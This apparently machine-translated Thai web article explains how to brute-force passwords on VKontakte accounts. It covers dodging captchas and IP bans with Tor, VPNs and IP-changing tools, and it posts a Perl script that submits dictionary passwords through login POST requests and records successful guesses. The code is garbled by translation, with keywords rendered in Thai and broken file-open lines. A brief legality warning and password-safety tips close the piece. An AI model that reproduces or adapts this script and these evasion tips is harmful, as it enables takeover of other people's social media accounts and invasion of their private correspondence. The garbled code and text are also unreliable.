ใน VK เวอร์ชันเก่า คุณสามารถเปลี่ยนไปใช้เวอร์ชันมือถือ - m.vk.com ได้ แต่ตอนนี้ไม่มีเวอร์ชันสำหรับมือถือเช่นนี้แล้ว - ในปี 2559 พวกเขาสร้างการออกแบบที่ปรับเปลี่ยนได้เพียงครั้งเดียว

จะเลี่ยงผ่าน VKontakte captcha ได้อย่างไร?

VK ต้องป้อน captcha หลังจากพยายามไม่สำเร็จ 3 ครั้ง (การรีบูต F5 ไม่ได้ช่วย) แต่เขารู้ได้อย่างไรว่า เป็นคุณนั้นเองพยายามเข้าสู่ระบบหลายครั้ง?

โดย IP
- คุกกี้ แคช และ JavaScript

ไม่มีปัญหากับคุกกี้ แคช และ JavaScript คุณสามารถปิดการใช้งานได้ในการตั้งค่าเบราว์เซอร์ของคุณ

IP สามารถเปลี่ยนได้โดยการติดตั้งโปรแกรมเพื่อเปลี่ยน IP - ไม่มีอะไรยุ่งยากในเรื่องนี้มีมากมายในเครือข่าย (Google ช่วย)

คุณสามารถใช้เบราว์เซอร์ TOR (ใครก็ไม่รู้ - นี่คือเบราว์เซอร์สำหรับการท่องเน็ตโดยไม่ระบุชื่อ นอกจากนี้ยังเปลี่ยนที่อยู่ IP ในแต่ละเซสชันใหม่ ซึ่งมีประโยชน์อย่างยิ่งสำหรับผู้ที่ท่องเว็บหรือทำงานใน SAR)

แต่เกือบจะปฏิเสธความพยายามทั้งหมดในการระบุตำแหน่งทางภูมิศาสตร์

เซิร์ฟเวอร์ VK จดจำตำแหน่ง (ทางภูมิศาสตร์) ที่มีการเข้าสู่ระบบครั้งล่าสุด

และถ้า IP ของคุณมาจากท้องที่อื่น (อาจ) คำจารึกจะปรากฏขึ้น:

"คุณกำลังพยายามเข้าสู่ระบบในชื่อ Ivan Ivanov จากตำแหน่งที่ผิดปกติ"

เพื่อยืนยันว่าคุณเป็นเจ้าของเพจจริง โปรดระบุหมายเลขโทรศัพท์ที่ขาดหายไปทั้งหมดที่เชื่อมโยงเพจ

สคริปต์สำหรับรูปแบบเว็บเดรัจฉาน (เช่น โปรแกรมแฮ็ค VK)

สำคัญ! บนเซิร์ฟเวอร์ VK มีสคริปต์ที่ติดตามความถี่ของการส่งแพ็กเก็ต เช่น หากคุณทุบด้วยความเร็ว N ครั้ง / วินาที คุณจะถูกส่งไปยังรายการแบนโดย IP โดยอัตโนมัติ
VK ยังใช้ GEOtracking

หากไม่มี IP แบบไดนามิก คุณก็ไม่ควรพยายามและพยายาม VPN สามารถช่วยได้
โดยส่วนตัวแล้ว ฉันถือว่ารหัสผ่าน VK เดรัจฉานนั้นไม่มีข้อดี แต่สำหรับผู้ที่ชื่นชอบ ฉันจะโพสต์สคริปต์ Pearl แบบเก่าที่ยืมมาจาก 5p4x2knet หรือที่รู้จักในชื่อ Apocalyptic และได้รับการแก้ไขเล็กน้อย

สคริปต์ทำงานโดยวิธี POST โดยมีพารามิเตอร์เพียงสองตัว - เข้าสู่ระบบและ รหัสผ่าน.

หากทราบข้อมูลการเข้าสู่ระบบ (เช่น หมายเลขโทรศัพท์) ให้กรอกค่าในช่องที่เกี่ยวข้องโดยไม่ต้องใช้พจนานุกรม

ฟิลด์ที่ซ่อนอยู่ - แคปต์ชา สคริปต์จะไม่ส่งรูปภาพ ซ่อนแหล่งที่มาของคำขอ (ตัวคุณเอง) ตามที่อธิบายไว้ข้างต้น

นี่คือที่มาของพจนานุกรมสัตว์เดรัจฉานที่เรารวบรวมไว้ในตอนต้นของบทความ (ขอเรียกว่าเช่น brut.txt )

เราต้องการไฟล์ที่โปรแกรมของเราจะรับข้อมูล

โปรแกรมจะบังคับให้สคริปต์ทั้งหมดที่ระบุในไฟล์นี้ ( infa.txt). หากมีเพียงสคริปต์เดียว คุณสามารถแทนที่ได้

โดยธรรมชาติแล้วไฟล์สำหรับบันทึกผลลัพธ์ ( ผลลัพธ์. txt)

ดังนั้น,
{
#เชื่อมต่อวัตถุ
$usagent = LWP::UserAgent
#เปิดไฟล์พร้อมข้อมูล (ถ้าเราเปิดไม่ได้ ให้ออก);
# โยนไฟล์ลงในอาร์เรย์ @infa แล้วปิด (หากมีเพียงสคริปต์เดียวก็สามารถระบุได้ทันที)
เปิด (INFA, ";
ปิด (INFA);

#เปิดพจนานุกรมเดรัจฉาน
เปิด (BRUT, ";
ปิด(BRUT);

#เปิดไฟล์พร้อมผลลัพธ์ (ต่อท้าย)
เปิด(ผลลัพธ์, ">$ARGV");
#เริ่มวนซ้ำ
foreach $ชื่อ (@infa)
{
#separate URL การเข้าสู่ระบบ ตัวแปร และข้อมูลข้อผิดพลาด
($url, $เข้าสู่ระบบ, $log_vr, $pwd_vr, $ล้มเหลว) = แยก (//, $ชื่อ);
#แสดง URL
พิมพ์ "$url...n";
#เริ่มวนอีกรอบ
foreach $brut (@brut)
{
#kill ช่องว่างและขึ้นบรรทัดใหม่
$pss =~ s/ //;
$pss =~ s/n//;

#เชื่อมต่อวัตถุใหม่
$usagent = LWP::UserAgent->ใหม่ ();
#สร้างแบบสอบถาม
$req = HTTP::Request->new(POST=>$url);
$req->content_type("แอปพลิเคชัน/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");

#แล้วส่ง
$result = $usagent -> คำขอ ($req);
#เขียนผลลัพธ์ไปยังตัวแปร
$res = $result->content;
#หากล้มเหลว ระบบจะสร้างข้อความแสดงข้อผิดพลาด
if($res!~ /$failed/i)
{
#output ข้อความด้วยรหัสผ่าน; บันทึกในผลลัพธ์
พิมพ์ "พบคำหยาบ มันไม่ใช่$pssnn";
พิมพ์ผลลัพธ์ "URL: $urlnLOGIN: $loginnBRUT: $pssnn";

#มิฉะนั้นเลือกต่อไป
ล่าสุด;
}
}
}
#ปิดไฟล์ result.txt
ปิด (ผล);

Brut VK เป็นซอฟต์แวร์ที่เลือกรหัสผ่านโดยอัตโนมัติสำหรับบัญชี VKontakte ชื่อเต็มของแอปพลิเคชั่นดังกล่าวคือ Brute force (กำลังดุร้าย) ออกแบบมาเพื่อแฮ็กโปรไฟล์ของผู้ใช้บนเว็บไซต์โซเชียลเน็ตเวิร์ก มีโปรแกรมดังกล่าวค่อนข้างน้อย แต่ส่วนใหญ่ไม่ได้ผลอย่างแน่นอน อย่างไรก็ตาม ด้วยยูทิลิตี้ที่เหมาะสม คุณจะได้รับข้อมูลที่ซ่อนอยู่ ฟังก์ชั่นที่นี่ค่อนข้างเรียบง่ายและการแฮ็กก็ง่าย

เดรัจฉาน "VK" คืออะไร

Brutus เป็นซอฟต์แวร์พิเศษที่เลือกรหัสผ่านสำหรับการเข้าสู่ระบบ อีเมล และอื่นๆ โดยการพิมพ์ตัวอักษรและตัวเลขผสมกัน หากคุณตั้งรหัสผ่านที่ซับซ้อน โปรแกรมจะใช้เวลานานในการเดา และในที่สุดอาจไม่สามารถรับมือกับงานได้ ผลลัพธ์ของเดรัจฉานนั้นได้รับอิทธิพลอย่างมากจากเทคนิคที่มีประสิทธิภาพที่ใช้ในการแฮ็คและความเสถียรของการเชื่อมต่ออินเทอร์เน็ตคืออะไร กระบวนการแฮ็คอาจใช้เวลาไม่กี่นาทีหรือทั้งวัน หากคุณตั้งรหัสผ่านที่มีความซับซ้อนสูง เช่น RKGJH4hKn2 ซอฟต์แวร์พิเศษอาจถอดรหัสไม่ได้เลย

ฐานคืออะไร

เพื่อให้โปรแกรม Bruteforce ทำงานได้ต้องมีข้อมูล ถ้าเธอไม่มีรหัสให้เลือก เธอก็จะไม่ทำอะไรเลย ฐานคือชุดรหัสและการเข้าสู่ระบบที่แตกต่างกัน หากรายการมีขนาดใหญ่ไม่ช้าก็เร็วคุณจะแฮ็คบัญชีของคุณโดยใช้แอปพลิเคชัน ชุดค่าผสมมีความยาวน้อยที่สุดของตัวอักษรและตัวเลขสามตัว ยาวที่สุดคือ 16 ตัวอักษร ขึ้นอยู่กับเวอร์ชันของซอฟต์แวร์ การเลือกรหัสเริ่มต้นด้วยตัวอักษร "A" ลงท้ายด้วยตัวอักษรตัวสุดท้ายในตัวอักษร ตัวอักษรสามารถเป็นภาษารัสเซียหรือภาษาอังกฤษ นี่คือข้อมูลหลักที่เป็นประโยชน์เกี่ยวกับฐาน

ใครต้องการมัน

ผู้ใช้ทุกคนมีเหตุผลของตนเองในการแฮ็กโปรไฟล์ VK ของผู้อื่น บางคนทำเพื่อความสนุก คนอื่นต้องการอ่านจดหมายโต้ตอบ นอกจากนี้ บางคนต้องการส่งข้อความที่ไม่ถูกต้อง โปรดทราบ - Brut เป็นสิ่งผิดกฎหมาย คุณจะต้องตอบคำถามสำหรับการโจรกรรมเสมอ เป็นการดีกว่าที่จะไม่ทำเช่นนี้ บัญชีที่ถูกแฮ็กสามารถกู้คืนได้ง่าย โดยเฉพาะอย่างยิ่งหากมีการระบุข้อมูลจริงระหว่างการลงทะเบียน การสร้างโปรไฟล์อย่างรวดเร็วโดยใช้ข้อมูลเท็จทำได้ยากขึ้น แต่โดยปกติแล้วแฮ็กเกอร์ไม่ต้องการ

พวกเขาขโมยข้อมูลจากเพจบนโซเชียลเน็ตเวิร์ก VK ก็ต่อเมื่อมีคนสนใจเท่านั้น โดยทั่วไปแล้ว แฮ็กเกอร์จะขายบัญชีที่ถูกขโมยให้กับลูกค้าเป็นจำนวนมาก จากนั้นสามารถขายต่อให้กับเจ้าของได้อีกครั้งหากมีข้อมูลสำคัญอยู่ที่นั่น แฮ็กเกอร์พยายามปกป้องตนเองและใช้พร็อกซีเซิร์ฟเวอร์เสมอ ด้วยสิ่งนี้จะไม่มีใครสังเกตเห็นเพราะจะไม่รู้จักที่อยู่ IP

หากคุณต้องการป้องกันตัวเองจากผู้บุกรุก ตั้งรหัสผ่านให้ยาวและซับซ้อน อย่าใช้บัญชี VK ของคุณเองบนเครือข่ายที่คนอื่นเข้าถึงคอมพิวเตอร์ได้ นอกจากนี้ อย่าบันทึกรหัสผ่านในเบราว์เซอร์ เพราะอาจถูกดักจับได้ง่าย หากคุณได้รับ SMS บนโทรศัพท์ของคุณเกี่ยวกับการลงชื่อเข้าใช้โปรไฟล์ VK แต่คุณไม่ได้ทำ ให้เปลี่ยนรหัสผ่านทันที พยายามทำให้เร็วที่สุด คุณจึงปกป้องตัวเองจากการสูญเสียข้อมูลส่วนตัวที่สำคัญ